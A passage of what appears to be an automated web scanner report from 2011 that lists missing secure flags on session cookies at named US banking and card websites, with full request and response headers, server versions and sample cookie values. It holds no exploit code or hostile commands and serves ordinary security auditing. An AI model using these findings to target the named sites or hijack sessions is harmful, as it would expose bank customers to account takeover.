Set-Cookie: mySession=c3d8cbcb%2D179f%2D45ab%2D8d5e%2D6201d0b9c5e5; path=/epayments
Cache-control: private
Server: Unknown Web Server
Set-Cookie: TLTSID=957CA41D4A7F550937527C8B9C274358; path=/

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: '[string: &quot;&quot;]'</font>
<p>
<fo
...[SNIP]...

10.15. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:51:16 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=v44xql55xf30pojhjmjotu55; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

10.16. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx HTTP/1.1
Host: securebank.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:51:17 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=zcov5huv0navdtav2ahkib55; path=/
Set-Cookie: vwsli=true; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

10.17. https://www.consumercardaccess.com/main/spectrum/Home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.consumercardaccess.com
Path:   /main/spectrum/Home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/spectrum/Home HTTP/1.1
Host: www.consumercardaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 15:55:00 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-cookie: JSESSIONID=03568F1802F7F86AA5F163DABD5F16ED;Path=/
Set-cookie: language=en;Path=/
Set-cookie: language=en;Path=/
Connection: close
Set-Cookie: NSC_ttm-dpotvnfsdbsebddftt=ffffffffc3a0626e45525d5f4f58455e445a4a4233c1;path=/;secure


<html>
   <head>
       <meta http-equiv='pragma' content='no-cache'/>
       <meta http-equiv='Cache-Control' content='no-cache'/>
       <meta http-equiv='Expires' content='0'/>    
       <LINK rel="stylesheet" hre
...[SNIP]...

10.18. https://www.morgankeegan.com/ca/mkca.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.morgankeegan.com
Path:   /ca/mkca.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ca/mkca.aspx HTTP/1.1
Host: www.morgankeegan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Thu, 03 Feb 2011 15:55:15 GMT
Content-Length: 17005
Content-Type: text/html; charset=utf-8
X-Powered-By: Morgan Keegan Ingenuity
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=r0mds0551s2n1suardxkio2o; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="en">
   <HEAD>
       <title>Client Access :: Morgan Keegan</title>
       <META h
...[SNIP]...

10.19. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: CFID=48347521;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: CFTOKEN=16733687;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: JSESSIONID=0430c25d29c2403f45f2TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=105037;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Thu, 03 Feb 2011 15:50:36 GMT
Connection: close


<style type="text/css">
   .BoldText {font-weight:bold; font-size:12px;}
   .WebAdminSortHeader {font-weight:bold; font-size:12px;}
   .WebAdminText {font-size:11px}
   .btnArrow {width: 20px; vertical-
...[SNIP]...

10.20. https://www.regions.com/personal_banking.rf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_banking.rf HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Cache-Control: private
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 25978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.21. https://www.sponsorinsight.com/regions/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.sponsorinsight.com
Path:   /regions/index.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/index.cfm HTTP/1.1
Host: www.sponsorinsight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Location: Logon.cfm
Set-Cookie: CFID=44771633;expires=Sat, 26-Jan-2041 15:50:38 GMT;path=/
Set-Cookie: CFTOKEN=92674862;expires=Sat, 26-Jan-2041 15:50:38 GMT;path=/
Set-Cookie: JSESSIONID=1430e30c48d8543b222cTR;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: SUSR=;path=/
Set-Cookie: SPRF=;path=/
Set-Cookie: SPLN=;path=/
Set-Cookie: SWU=105038j0;path=/
Set-Cookie: SSTP=0;path=/
Date: Thu, 03 Feb 2011 15:50:37 GMT
Connection: close

<META HTTP-EQUIV="PRAGMA" CONTENT="no-cache">

10.22. https://www.suntrust.com/portal/server.pt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.suntrust.com
Path:   /portal/server.pt

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/server.pt?space=CommunityPage&control=SetCommunity&PageID=0&CommunityID=305&cid=PS-PSRC-RT-BING-00033319 HTTP/1.1
Host: www.suntrust.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:42:21 GMT
Server: Microsoft-IIS/6.0
Host-Name: P13F
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=jqj5n545nhrvfvbrsxhkuq45; path=/; HttpOnly
Expires: 1296654141940
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1296740541940
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerwww.suntrust.com-pvic=1067582474.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 73462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/">
<!-- This page uses the base page layo
...[SNIP]...

10.23. https://www124.americanexpress.com/cards/benefits/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www124.americanexpress.com
Path:   /cards/benefits/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cards/benefits/ HTTP/1.1
Host: www124.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:13:21 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742401135944; path=/; expires=Sun, 07-Feb-16 14:13:21 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000TKqZC3FBtwwLR7ggzow9W6Y:vh7pui00;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33942


<!-- AMU Integration Imports -->


<HTML>
<HEAD>
<TITLE>Credit Card Services & Benefits - Credit Card Protection | American Express</TITLE>
<META name="description" content="In addition to the excl
...[SNIP]...

10.24. https://www201.americanexpress.com/MobileWeb/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /MobileWeb/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MobileWeb/index.jsp HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099864083; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0001tRlF96bogoCEk-GWeNUtldM:11m137ri1;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Co
...[SNIP]...

10.25. https://www201.americanexpress.com/cards/DecodeServlet  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /cards/DecodeServlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/DecodeServlet HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000sCj6t9Hna1rccUoRjq-IM24:10ue6mp18;Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Content-Type: text/html
Content-Language: en-US


10.26. https://www201.americanexpress.com/secure/my-special-offers  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /secure/my-special-offers

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/my-special-offers HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:16 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000I-vPqmYD-VFlGwhjjEv6j4o:10ue6mp18;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 60273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<script src="h
...[SNIP]...

10.27. https://www201.americanexpress.com/smsweb/un_Landing.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /smsweb/un_Landing.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smsweb/un_Landing.do HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0001CVQ7-fOs0FkadFJVEKHB1-6:11m1380s8; SaneID=173.193.214.243-1296742163652146; SIFR-PREFETCHED=true;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:26:17 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000sVlsrVbPIB1cvLVnVyWfqn8:11nugl6hc;Path=/
Set-Cookie: JSESSIONID=0000eNOeOQ3Hspgrd77PseRgXZw:11nugl6hc;Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-equiv="Content-type"
...[SNIP]...

10.28. https://www209.americanexpress.com/merchant/marketing-data/pages/home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www209.americanexpress.com
Path:   /merchant/marketing-data/pages/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /merchant/marketing-data/pages/home HTTP/1.1
Host: www209.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:20 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: mertkit_JSESSIONID=0000TzQ53Y5cTtY7bAicAgzlKan:15bvkorqu; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/
Content-Length: 67227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...

10.29. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:26 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000bW6uKYN7VFONJWqjrLhrVkp:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 13749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

10.30. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do?vgnextoid=2621c0f7c5a4c110VgnVCM100000defaad94RCRD&inav=footer_fraud_protection_center HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000JPI55sd8KNdx8lYTMy7brTn:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Fraud Protection Center</title>

...[SNIP]...

10.31. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement&inav=footer_privacy_statement HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000WljRBDsQJbtD5N0xFge7RAb:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 55185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Internet Privacy Statement</titl
...[SNIP]...

10.32. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalcards.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/int/contactus/personalcards.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/int/contactus/personalcards.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=00007MfRqAecrEgPk7WMB6uziyX:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 13749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

10.33. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/int/us/en/cmaproductspage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/int/us/en/cmaproductspage.do?vgnextoid=bbf185df62df5210VgnVCM100000defaad94RCRD&source=footer_card_agreements&inav=footer_card_agreements HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:35 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000Veb0ftG4-cYW9OOkY_veomE:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 57019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>


<link
...[SNIP]...

10.34. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www213.americanexpress.com
Path:   /PowerLabsWeb/un/landingpage.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1
Host: www213.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109740701; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000F5wGIYVCO3uWBH-xeaFC48P:129nma7r7;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81548


<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<META name="GENERATOR" content="IBM WebSphere Studio">
<META http-equiv="Content-Style-Ty
...[SNIP]...

10.35. https://www257.americanexpress.com/openhome/smallbusiness.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www257.americanexpress.com
Path:   /openhome/smallbusiness.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /openhome/smallbusiness.do?isFlash=true&inav=menu_business_openhome HTTP/1.1
Host: www257.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:37 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000akSHbW6x5an_FsyrXyIdKqc:14t0oisgo; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

10.36. https://www295.americanexpress.com/cards/home.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /cards/home.do

Issue detail

